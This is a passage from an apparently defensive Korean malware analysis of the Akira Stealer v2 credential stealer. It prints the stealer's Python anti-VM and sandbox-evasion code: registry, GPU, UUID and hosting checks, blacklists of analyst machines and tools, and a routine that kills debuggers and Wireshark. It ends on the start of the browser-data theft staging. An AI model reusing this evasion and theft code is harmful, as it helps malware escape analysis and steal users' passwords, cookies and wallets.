검사가 이루어지는 환경(기업이나 연구 네트워크에서 흔함)을 식별하기 위해, 멀웨어는 ",[550,5392,5393],{},".in"," 아래의 무작위 하위 도메인에 무해한 HTTPS 요청을 보냅니다. DNS 필터링, 인터셉션 프록시, 인증서 피닝 실패 등으로 연결이 실패하면, 이는 멀웨어가 분석되고 있다는 신호일 수 있습니다.",[587,5396,5398],{"className":4489,"code":5397,"language":4491,"meta":593,"style":593},"@staticmethod\ndef checkHTTPSimulation() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n    except:\n        return False\n    return True\n",[550,5399,5400,5404,5409,5414,5418,5423,5427,5431],{"__ignoreMap":593},[1679,5401,5402],{"class":1681,"line":1682},[1679,5403,4980],{},[1679,5405,5406],{"class":1681,"line":2059},[1679,5407,5408],{},"def checkHTTPSimulation() -> bool:\n",[1679,5410,5411],{"class":1681,"line":2065},[1679,5412,5413],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n",[1679,5415,5416],{"class":1681,"line":2071},[1679,5417,5143],{},[1679,5419,5420],{"class":1681,"line":2393},[1679,5421,5422],{},"        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n",[1679,5424,5425],{"class":1681,"line":2399},[1679,5426,5168],{},[1679,5428,5429],{"class":1681,"line":3055},[1679,5430,5378],{},[1679,5432,5433],{"class":1681,"line":3848},[1679,5434,5435],{},"    return True\n",[532,5437,5438],{},"이 미묘한 접근은 경보를 트리거하거나 전용 인프라를 요구하지 않고 네트워크 경로의 무결성을 시험합니다.",[861,5440,5442],{"id":5441},"_7310-레지스트리-및-gpu-드라이버-검사-가상-gpu-시그니처-탐지","7.3.10 레지스트리 및 GPU 드라이버 검사 – 가상 GPU 시그니처 탐지",[532,5444,867],{},[532,5446,5447,5448,5451],{},"특정 가상 환경은 레지스트리 키나 GPU 드라이버 디스크립터로 드러납니다. Akira는 이중 전략을 실행합니다. 그래픽 서브시스템에 연결된 레지스트리 항목을 조회하고, 별도로 ",[550,5449,5450],{},"wmic","의 출력에서 의심스러운 GPU 문자열을 검사합니다.",[587,5453,5455],{"className":4489,"code":5454,"language":4491,"meta":593,"style":593},"@staticmethod\ndef checkRegistry() -> bool:\n    r1 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n        capture_output=True, shell=True)\n    r2 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n        capture_output=True, shell=True)\n\n    # GPU name check\n    gpu_out = subprocess.run(\n        \"wmic path win32_VideoController get name\",\n        capture_output=True, shell=True).stdout.decode().splitlines()\n    gpucheck = any(x in gpu_out[2].lower()\n                   for x in (\"virtualbox\", \"vmware\"))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[550,5456,5457,5461,5466,5471,5476,5481,5486,5491,5495,5499,5504,5509,5514,5519,5524,5529],{"__ignoreMap":593},[1679,5458,5459],{"class":1681,"line":1682},[1679,5460,4980],{},[1679,5462,5463],{"class":1681,"line":2059},[1679,5464,5465],{},"def checkRegistry() -> bool:\n",[1679,5467,5468],{"class":1681,"line":2065},[1679,5469,5470],{},"    r1 = subprocess.run(\n",[1679,5472,5473],{"class":1681,"line":2071},[1679,5474,5475],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n",[1679,5477,5478],{"class":1681,"line":2393},[1679,5479,5480],{},"        capture_output=True, shell=True)\n",[1679,5482,5483],{"class":1681,"line":2399},[1679,5484,5485],{},"    r2 = subprocess.run(\n",[1679,5487,5488],{"class":1681,"line":3055},[1679,5489,5490],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n",[1679,5492,5493],{"class":1681,"line":3848},[1679,5494,5480],{},[1679,5496,5497],{"class":1681,"line":3854},[1679,5498,3845],{"emptyLinePlaceholder":325},[1679,5500,5501],{"class":1681,"line":4103},[1679,5502,5503],{},"    # GPU name check\n",[1679,5505,5506],{"class":1681,"line":5028},[1679,5507,5508],{},"    gpu_out = subprocess.run(\n",[1679,5510,5511],{"class":1681,"line":5034},[1679,5512,5513],{},"        \"wmic path win32_VideoController get name\",\n",[1679,5515,5516],{"class":1681,"line":5040},[1679,5517,5518],{},"        capture_output=True, shell=True).stdout.decode().splitlines()\n",[1679,5520,5521],{"class":1681,"line":5046},[1679,5522,5523],{},"    gpucheck = any(x in gpu_out[2].lower()\n",[1679,5525,5526],{"class":1681,"line":5052},[1679,5527,5528],{},"                   for x in (\"virtualbox\", \"vmware\"))\n",[1679,5530,5531],{"class":1681,"line":5058},[1679,5532,5533],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[532,5535,5536],{},"이러한 하드웨어 계층 검사는 가상화된 디스플레이 어댑터를 완전히 가리지 못하는 분석가 환경에 특히 효과적입니다.",[861,5538,5540],{"id":5539},"_7311-작업-종료-실시간으로-분석-도구-억제","7.3.11 작업 종료 – 실시간으로 분석 도구 억제",[532,5542,867],{},[532,5544,5545],{},"Akira는 수동적으로 탐지를 회피하는 데 그치지 않고, 알려진 분석 또는 디버깅 도구를 능동적으로 종료함으로써 한 걸음 더 나아갑니다. 백그라운드 스레드를 분리 실행하여 프로세스 목록을 순회하고 일치하는 것을 모두 종료합니다.",[587,5547,5549],{"className":4489,"code":5548,"language":4491,"meta":593,"style":593},"@staticmethod\ndef killTasks() -> None:\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n\nBLACKLISTED_TASKS = (\n  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n  # ... dozens more ...\n  'glasswire','requestly'\n)\n",[550,5550,5551,5555,5560,5565,5569,5574,5579,5584,5589],{"__ignoreMap":593},[1679,5552,5553],{"class":1681,"line":1682},[1679,5554,4980],{},[1679,5556,5557],{"class":1681,"line":2059},[1679,5558,5559],{},"def killTasks() -> None:\n",[1679,5561,5562],{"class":1681,"line":2065},[1679,5563,5564],{},"    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[1679,5566,5567],{"class":1681,"line":2071},[1679,5568,3845],{"emptyLinePlaceholder":325},[1679,5570,5571],{"class":1681,"line":2393},[1679,5572,5573],{},"BLACKLISTED_TASKS = (\n",[1679,5575,5576],{"class":1681,"line":2399},[1679,5577,5578],{},"  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n",[1679,5580,5581],{"class":1681,"line":3055},[1679,5582,5583],{},"  # ... dozens more ...\n",[1679,5585,5586],{"class":1681,"line":3848},[1679,5587,5588],{},"  'glasswire','requestly'\n",[1679,5590,5591],{"class":1681,"line":3854},[1679,5592,5246],{},[532,5594,5595],{},"인시던트 대응자와 멀웨어 분석가가 흔히 사용하는 이 도구들은 의미 있는 행위 아티팩트를 수집하기 전에 무력화됩니다.",[532,5597,5598],{},[539,5599,5600],{},"요약",[532,5602,5603],{},"Akira는 환경 변수와 레지스트리 키부터 네트워크 탐침과 작업 목록에 이르기까지 여러 시스템 계층을 겨냥하는 정교한 분석 방해 기법 모음을 사용합니다. 이 메커니즘들은 자동화된 샌드박스와 수동 검사 환경 모두를 탐지하고 회피하도록 설계되었습니다.",[532,5605,5606],{},"수동적 지문 채취와 능동적 억제(예: 작업 종료)의 조합은 중급 멀웨어 계열조차 이제 다층 회피 로직을 통합하고 있음을 보여 줍니다.",[861,5608,5610],{"id":5609},"_7312-전체-블랙리스트-및-탐지-함수","7.3.12 전체 블랙리스트 및 탐지 함수",[532,5612,867],{},[532,5614,5615],{},[539,5616,5617],{},"블랙리스트에 등록된 하드웨어 UUID",[587,5619,5622],{"className":5620,"code":5621,"language":592},[590],"BLACKLISTED_UUIDS = (\n    '7AB5C494-39F5-4941-9163-47F54D6D5016',\n    '032E02B4-0499-05C3-0806-3C0700080009',\n    '03DE0294-0480-05DE-1A06-350700080009',\n    '11111111-2222-3333-4444-555555555555',\n    '6F3CA5EC-BEC9-4A4D-8274-11168F640058',\n    'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548',\n    '4C4C4544-0050-3710-8058-CAC04F59344A',\n    '00000000-0000-0000-0000-AC1F6BD04972',\n    '00000000-0000-0000-0000-000000000000',\n    '5BD24D56-789F-8468-7CDC-CAA7222CC121',\n    '49434D53-0200-9065-2500-65902500E439',\n    '49434D53-0200-9036-2500-36902500F022',\n    '777D84B3-88D1-451C-93E4-D235177420A7',\n    '49434D53-0200-9036-2500-369025000C65',\n    'B1112042-52E8-E25B-3655-6A4F54155DBF',\n    '00000000-0000-0000-0000-AC1F6BD048FE',\n    'EB16924B-FB6D-4FA1-8666-17B91F62FB37',\n    'A15A930C-8251-9645-AF63-E45AD728C20C',\n    '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3',\n    'C7D23342-A5D4-68A1-59AC-CF40F735B363',\n    '63203342-0EB0-AA1A-4DF5-3FB37DBB0670',\n    '44B94D56-65AB-DC02-86A0-98143A7423BF',\n    '6608003F-ECE4-494E-B07E-1C4615D1D93C',\n    'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',\n    '49434D53-0200-9036-2500-369025003AF0',\n    '8B4E8278-525C-7343-B825-280AEBCD3BCB',\n    '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27',\n    '79AF5279-16CF-4094-9758-F88A616D81B4',\n    'FE822042-A70C-D08B-F1D1-C207055A488F',\n    '76122042-C286-FA81-F0A8-514CC507B250',\n    '481E2042-A1AF-D390-CE06-A8F783B1E76A',\n    'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C',\n    '9961A120-E691-4FFE-B67B-F0E4115D5919'\n)\n",[550,5623,5621],{"__ignoreMap":593},[532,5625,5626],{},[539,5627,5628],{},"블랙리스트에 등록된 컴퓨터 이름",[587,5630,5633],{"className":5631,"code":5632,"language":592},[590],"BLACKLISTED_COMPUTERNAMES = (\n    '00900BC83802', 'bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr',\n    'b30f0242-1c6a-4', 'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb',\n    'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc',\n    'desktop-b0t93d6', 'desktop-1pykp29', 'desktop-1y2433r', 'wileypc',\n    'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs',\n    'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc',\n    'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076',\n    'desktop-vkeons4', 'NTT-EFF-2W11WSS'\n)\n",[550,5634,5632],{"__ignoreMap":593},[532,5636,5637],{},[539,5638,5639],{},"블랙리스트에 등록된 사용자 계정",[587,5641,5644],{"className":5642,"code":5643,"language":592},[590],"BLACKLISTED_USERS = (\n    'wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex',\n    'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq',\n    'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a',\n    'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl',\n    'harry johnson', 'j.seance', 'a.monaldo', 'tvm'\n)\n",[550,5645,5643],{"__ignoreMap":593},[532,5647,5648],{},[539,5649,5650],{},"블랙리스트에 등록된 분석 도구 프로세스",[587,5652,5655],{"className":5653,"code":5654,"language":592},[590],"BLACKLISTED_TASKS = (\n    'fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler',\n    'vboxservice', 'df5serv', 'vboxtray', 'vmtoolsd', 'vmwaretray',\n    'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice',\n    'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc',\n    'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol',\n    'ksdumperclient', 'ksdumper', 'joeboxserver', 'vmwareservice',\n    'discordtokenprotector', 'glasswire', 'requestly'\n)\n",[550,5656,5654],{"__ignoreMap":593},[532,5658,5659],{},[539,5660,5661],{},"핵심 탐지 메서드",[587,5663,5665],{"className":4489,"code":5664,"language":4491,"meta":593,"style":593},"@staticmethod\ndef checkUUID() -> bool:\n    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\",\n            shell=True, capture_output=True\n        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n\n@staticmethod\ndef checkComputerName() -> bool:\n    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n\n@staticmethod\ndef checkUsers() -> bool:\n    \"\"\"Current login username in VM users list.\"\"\"\n    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n\n@staticmethod\ndef checkHosting() -> bool:\n    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET', 'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n\n@staticmethod\ndef checkHTTPSimulation() -> bool:\n    \"\"\"\n    Attempt TLS to random subdomain.\n    Failure → possible HTTPS interception/sandbox.\n    \"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n        return True\n    except:\n        return False\n\n@staticmethod\ndef checkRegistry() -> bool:\n    \"\"\"\n    Look for VirtualBox/VMware in:\n    - Registry driver entries\n    - Video card name via WMIC\n    - Presence of VM-specific folders\n    \"\"\"\n    r1 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n        shell=True, capture_output=True\n    )\n    r2 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n        shell=True, capture_output=True\n    )\n    gpu = any(\n        x.lower() in subprocess.run(\n            \"wmic path win32_VideoController get name\",\n            shell=True, capture_output=True\n        ).stdout.decode().splitlines()[2].lower()\n        for x in (\"virtualbox\", \"vmware\")\n    )\n    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n\n@staticmethod\ndef killTasks() -> None:\n    \"\"\"Continuously terminate known analysis processes.\"\"\"\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[550,5666,5667,5671,5675,5680,5684,5688,5693,5698,5703,5707,5711,5715,5719,5723,5727,5732,5737,5741,5745,5749,5754,5759,5763,5767,5771,5776,5781,5786,5791,5797,5802,5807,5812,5817,5822,5827,5833,5839,5845,5850,5855,5860,5865,5871,5876,5881,5886,5891,5896,5901,5907,5913,5919,5925,5930,5935,5941,5947,5953,5959,5964,5969,5975,5980,5985,5991,5997,6003,6008,6014,6020,6025,6031,6037,6042,6047,6052,6058],{"__ignoreMap":593},[1679,5668,5669],{"class":1681,"line":1682},[1679,5670,4980],{},[1679,5672,5673],{"class":1681,"line":2059},[1679,5674,5138],{},[1679,5676,5677],{"class":1681,"line":2065},[1679,5678,5679],{},"    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n",[1679,5681,5682],{"class":1681,"line":2071},[1679,5683,5143],{},[1679,5685,5686],{"class":1681,"line":2393},[1679,5687,5148],{},[1679,5689,5690],{"class":1681,"line":2399},[1679,5691,5692],{},"            \"wmic csproduct get uuid\",\n",[1679,5694,5695],{"class":1681,"line":3055},[1679,5696,5697],{},"            shell=True, capture_output=True\n",[1679,5699,5700],{"class":1681,"line":3848},[1679,5701,5702],{},"        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n",[1679,5704,5705],{"class":1681,"line":3854},[1679,5706,5168],{},[1679,5708,5709],{"class":1681,"line":4103},[1679,5710,5173],{},[1679,5712,5713],{"class":1681,"line":5028},[1679,5714,5178],{},[1679,5716,5717],{"class":1681,"line":5034},[1679,5718,3845],{"emptyLinePlaceholder":325},[1679,5720,5721],{"class":1681,"line":5040},[1679,5722,4980],{},[1679,5724,5725],{"class":1681,"line":5046},[1679,5726,5207],{},[1679,5728,5729],{"class":1681,"line":5052},[1679,5730,5731],{},"    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n",[1679,5733,5734],{"class":1681,"line":5058},[1679,5735,5736],{},"    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[1679,5738,5739],{"class":1681,"line":5064},[1679,5740,3845],{"emptyLinePlaceholder":325},[1679,5742,5743],{"class":1681,"line":5070},[1679,5744,4980],{},[1679,5746,5747],{"class":1681,"line":5076},[1679,5748,5272],{},[1679,5750,5751],{"class":1681,"line":5082},[1679,5752,5753],{},"    \"\"\"Current login username in VM users list.\"\"\"\n",[1679,5755,5756],{"class":1681,"line":5088},[1679,5757,5758],{},"    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n",[1679,5760,5761],{"class":1681,"line":5094},[1679,5762,3845],{"emptyLinePlaceholder":325},[1679,5764,5765],{"class":1681,"line":5100},[1679,5766,4980],{},[1679,5768,5769],{"class":1681,"line":5106},[1679,5770,5340],{},[1679,5772,5773],{"class":1681,"line":5112},[1679,5774,5775],{},"    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n",[1679,5777,5779],{"class":1681,"line":5778},26,[1679,5780,5345],{},[1679,5782,5784],{"class":1681,"line":5783},27,[1679,5785,5143],{},[1679,5787,5789],{"class":1681,"line":5788},28,[1679,5790,5354],{},[1679,5792,5794],{"class":1681,"line":5793},29,[1679,5795,5796],{},"            'GET', 'http://ip-api.com/line/?fields=hosting'\n",[1679,5798,5800],{"class":1681,"line":5799},30,[1679,5801,5369],{},[1679,5803,5805],{"class":1681,"line":5804},31,[1679,5806,5168],{},[1679,5808,5810],{"class":1681,"line":5809},32,[1679,5811,5378],{},[1679,5813,5815],{"class":1681,"line":5814},33,[1679,5816,3845],{"emptyLinePlaceholder":325},[1679,5818,5820],{"class":1681,"line":5819},34,[1679,5821,4980],{},[1679,5823,5825],{"class":1681,"line":5824},35,[1679,5826,5408],{},[1679,5828,5830],{"class":1681,"line":5829},36,[1679,5831,5832],{},"    \"\"\"\n",[1679,5834,5836],{"class":1681,"line":5835},37,[1679,5837,5838],{},"    Attempt TLS to random subdomain.\n",[1679,5840,5842],{"class":1681,"line":5841},38,[1679,5843,5844],{},"    Failure → possible HTTPS interception/sandbox.\n",[1679,5846,5848],{"class":1681,"line":5847},39,[1679,5849,5832],{},[1679,5851,5853],{"class":1681,"line":5852},40,[1679,5854,5413],{},[1679,5856,5858],{"class":1681,"line":5857},41,[1679,5859,5143],{},[1679,5861,5863],{"class":1681,"line":5862},42,[1679,5864,5422],{},[1679,5866,5868],{"class":1681,"line":5867},43,[1679,5869,5870],{},"        return True\n",[1679,5872,5874],{"class":1681,"line":5873},44,[1679,5875,5168],{},[1679,5877,5879],{"class":1681,"line":5878},45,[1679,5880,5378],{},[1679,5882,5884],{"class":1681,"line":5883},46,[1679,5885,3845],{"emptyLinePlaceholder":325},[1679,5887,5889],{"class":1681,"line":5888},47,[1679,5890,4980],{},[1679,5892,5894],{"class":1681,"line":5893},48,[1679,5895,5465],{},[1679,5897,5899],{"class":1681,"line":5898},49,[1679,5900,5832],{},[1679,5902,5904],{"class":1681,"line":5903},50,[1679,5905,5906],{},"    Look for VirtualBox/VMware in:\n",[1679,5908,5910],{"class":1681,"line":5909},51,[1679,5911,5912],{},"    - Registry driver entries\n",[1679,5914,5916],{"class":1681,"line":5915},52,[1679,5917,5918],{},"    - Video card name via WMIC\n",[1679,5920,5922],{"class":1681,"line":5921},53,[1679,5923,5924],{},"    - Presence of VM-specific folders\n",[1679,5926,5928],{"class":1681,"line":5927},54,[1679,5929,5832],{},[1679,5931,5933],{"class":1681,"line":5932},55,[1679,5934,5470],{},[1679,5936,5938],{"class":1681,"line":5937},56,[1679,5939,5940],{},"        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n",[1679,5942,5944],{"class":1681,"line":5943},57,[1679,5945,5946],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n",[1679,5948,5950],{"class":1681,"line":5949},58,[1679,5951,5952],{},"        shell=True, capture_output=True\n",[1679,5954,5956],{"class":1681,"line":5955},59,[1679,5957,5958],{},"    )\n",[1679,5960,5962],{"class":1681,"line":5961},60,[1679,5963,5485],{},[1679,5965,5967],{"class":1681,"line":5966},61,[1679,5968,5940],{},[1679,5970,5972],{"class":1681,"line":5971},62,[1679,5973,5974],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n",[1679,5976,5978],{"class":1681,"line":5977},63,[1679,5979,5952],{},[1679,5981,5983],{"class":1681,"line":5982},64,[1679,5984,5958],{},[1679,5986,5988],{"class":1681,"line":5987},65,[1679,5989,5990],{},"    gpu = any(\n",[1679,5992,5994],{"class":1681,"line":5993},66,[1679,5995,5996],{},"        x.lower() in subprocess.run(\n",[1679,5998,6000],{"class":1681,"line":5999},67,[1679,6001,6002],{},"            \"wmic path win32_VideoController get name\",\n",[1679,6004,6006],{"class":1681,"line":6005},68,[1679,6007,5697],{},[1679,6009,6011],{"class":1681,"line":6010},69,[1679,6012,6013],{},"        ).stdout.decode().splitlines()[2].lower()\n",[1679,6015,6017],{"class":1681,"line":6016},70,[1679,6018,6019],{},"        for x in (\"virtualbox\", \"vmware\")\n",[1679,6021,6023],{"class":1681,"line":6022},71,[1679,6024,5958],{},[1679,6026,6028],{"class":1681,"line":6027},72,[1679,6029,6030],{},"    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n",[1679,6032,6034],{"class":1681,"line":6033},73,[1679,6035,6036],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n",[1679,6038,6040],{"class":1681,"line":6039},74,[1679,6041,3845],{"emptyLinePlaceholder":325},[1679,6043,6045],{"class":1681,"line":6044},75,[1679,6046,4980],{},[1679,6048,6050],{"class":1681,"line":6049},76,[1679,6051,5559],{},[1679,6053,6055],{"class":1681,"line":6054},77,[1679,6056,6057],{},"    \"\"\"Continuously terminate known analysis processes.\"\"\"\n",[1679,6059,6061],{"class":1681,"line":6060},78,[1679,6062,5564],{},[861,6064,6066],{"id":6065},"_7313-실행-및-중단-로직","7.3.13 실행 및 중단 로직",[532,6068,867],{},[2079,6070,6071,6084,6097],{},[606,6072,6073,3256,6076,6079,6080,6083],{},[539,6074,6075],{},"초기화:",[550,6077,6078],{},"Akira.__init__()"," 생성자 내에서, 멀웨어는 즉시 ",[550,6081,6082],{},"VmProtect.isVM(1)","을 호출하여 빠르고 오버헤드가 낮은 가상화 검사(예: 호스트명, 사용자, HTTPS 시뮬레이션)를 수행합니다.",[606,6085,6086,6089,6090,6093,6094,6096],{},[539,6087,6088],{},"심층 검사:"," 초기 테스트를 통과하면, ",[550,6091,6092],{},"VmProtect.isVM(2)","를 호출하여 하드웨어 UUID 검증, ",[550,6095,5325],{},"을 통한 호스팅 탐지, 레지스트리 아티팩트 스캔을 포함한 더 포괄적인 검사를 트리거합니다.",[606,6098,6099,6102,6103,6105,6106,6108],{},[539,6100,6101],{},"중단 경로:"," 어떤 검사든 ",[550,6104,4665],{},"를 반환하여 가상 또는 분석 환경임을 나타내면, 코드는 ",[550,6107,4669],{},"를 실행하여 어떤 데이터 수집이나 유출 루틴이 실행되기 전에 실행을 종료합니다.",[861,6110,6112],{"id":6111},"_7314-결론","7.3.14 결론",[532,6114,867],{},[532,6116,6117,6119,6120,6122],{},[4626,6118,649],{}," 의 ",[550,6121,4613],{}," 모듈은 로컬 시스템 지문과 네트워크 기반 휴리스틱을 모두 활용하여 분석에 대한 계층화된 방어를 보여 줍니다. 이러한 정확한 검사들을 이해하고 계측함으로써, 방어자는 판도를 뒤집어 운영 환경에서 이처럼 회피적인 멀웨어를 탐지할 수 있습니다.",[713,6124,6126],{"id":6125},"_74-브라우저-데이터-유출","7.4 브라우저 데이터 유출",[532,6128,719],{},[532,6130,6131,6132,2679,6135,6138],{},"Akira Stealer v2의 핵심 목표 중 하나는 브라우저에 저장된 민감 데이터의 대규모 추출입니다. 멀웨어는 ",[539,6133,6134],{},"Chromium 기반",[539,6136,6137],{},"Gecko 기반(Firefox)"," 브라우저를 모두 겨냥하는 맞춤 모듈을 구현합니다. 그 기능에는 저장된 암호, 쿠키, 신용카드 데이터, 자동 완성 항목, 심지어 전체 계정 하이재킹에 재사용될 수 있는 세션 토큰의 추출 및 복호화가 포함됩니다.",[532,6140,6141],{},[539,6142,6143],{},"1. 작업 공간 설정",[587,6145,6147],{"className":4489,"code":6146,"language":4491,"meta":593,"style":593},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\nos.makedirs(client_dir, exist_ok=True)\nfor sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[550,6148,6149,6154,6159,6164],{"__ignoreMap":593},[1679,6150,6151],{"class":1681,"line":1682},[1679,6152,6153],{},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\n",[1679,6155,6156],{"class":1681,"line":2059},[1679,6157,6158],{},"os.makedirs(client_dir, exist_ok=True)\n",[1679,6160,6161],{"class":1681,"line":2065},[1679,6162,6163],{},"for sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n",[1679,6165,6166],{"class":1681,"line":2071},[1679,6167,6168],{},"    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[603,6170,6171,6178,6181,6184,6187],{},[606,6172,6173,6174],{},"시스템 임시 디렉터리 아래에 피해자의 머신 이름(%TEMP%\\DESKTOP-",[6175,6176,6177],"hostname",{},")을 딴 일회용 스테이징 영역을 생성하여, 유출된 모든 아티팩트가 쉽게 아카이브 가능한 하나의 위치로 통합되도록 합니다.",[606,6179,6180],{},"유형별로 데이터를 격리합니다. 여섯 개의 전용 하위 폴더(Passwords, Cookies, CreditCards, History, Autofill, Wallets)가 이름 충돌을 방지하고 이후 압축을 단순화합니다. 각 추출 루틴은 자신의 폴더에만 기록합니다.",[606,6182,6183],{},"멱등적 디렉터리 생성은 exist_ok=True를 사용하므로, 멀웨어가 재실행되어도(예: 재부팅이나 지속성) 충돌하거나 기존 데이터를 덮어쓰지 않고 새 항목이 동일한 구조에 추가됩니다.",[606,6185,6186],{},"선택적 정리를 용이하게 합니다. 업로드와 알림이 완료되면, 스틸러는 Utils.clear_client_folder()를 호출하여 자신의 작업 공간만 재귀적으로 삭제하고 잔여 파일을 남기지 않을 수 있습니다.",[606,6188,6189],{},"병렬 추출 스레드의 무대를 마련합니다. 모든 대상을 미리 생성해 두면, 브라우저 자격 증명, 쿠키, 자동 완성, 암호화폐 지갑 데이터 등을 수집하는 백그라운드 스레드가 추가 검사 없이 즉시 결과를 기록할 수 있어, 오버헤드를 최소화하고 방어 훅이 예기치 않은 파일 I/O를 탐지할 여지를 줄입니다.",[532,6191,6192],{},[539,6193,6194],{},"2. 지원 브라우저",[603,6196,6197,6239],{},[606,6198,6199,6201],{},[539,6200,6134],{},[603,6202,6203,6206,6209,6212,6215,6218,6221,6224,6227,6230,6233,6236],{},[606,6204,6205],{},"Google Chrome(Stable & SxS)",[606,6207,6208],{},"Microsoft Edge",[606,6210,6211],{},"Brave Browser",[606,6213,6214],{},"Opera & Opera GX",[606,6216,6217],{},"Chromium",[606,6219,6220],{},"Comodo Dragon",[606,6222,6223],{},"Epic Privacy Browser",[606,6225,6226],{},"Iridium Browser",[606,6228,6229],{},"UR Browser",[606,6231,6232],{},"Vivaldi Browser",[606,6234,6235],{},"Yandex Browser",[606,6237,6238],{},"Slimjet, Amigo, Torch, Kometa, Orbitum, CentBrowser, 7Star, Sputnik, Uran",[606,6240,6241,3193,6244,6247,6248,6259,6261,6262,6271,6273,6274,619,6277,6280],{},[539,6242,6243],{},"Firefox 기반",[550,6245,6246],{},"GeckoDriver","를 통해)",[603,6249,6250,6253,6256],{},[606,6251,6252],{},"Mozilla Firefox",[606,6254,6255],{},"Waterfox",[606,6257,6258],{},"Pale Moon",[696,6260],{},"Akira는 환경 변수와 잘 알려진 디렉터리 구조를 사용해 사용자 프로필을 동적으로 찾습니다:",[587,6263,6265],{"className":4489,"code":6264,"language":4491,"meta":593,"style":593},"user_path = os.path.join(os.getenv(\"LOCALAPPDATA\"), \"Google\", \"Chrome\", \"User Data\")\n",[550,6266,6267],{"__ignoreMap":593},[1679,6268,6269],{"class":1681,"line":1682},[1679,6270,6264],{},[696,6272],{},"사용 가능한 브라우저 프로필(예: ",[550,6275,6276],{},"Default",[550,6278,6279],{},"Profile 1"," 등)을 재귀적으로 확인하고 해당 경로 내의 SQLite 데이터베이스를 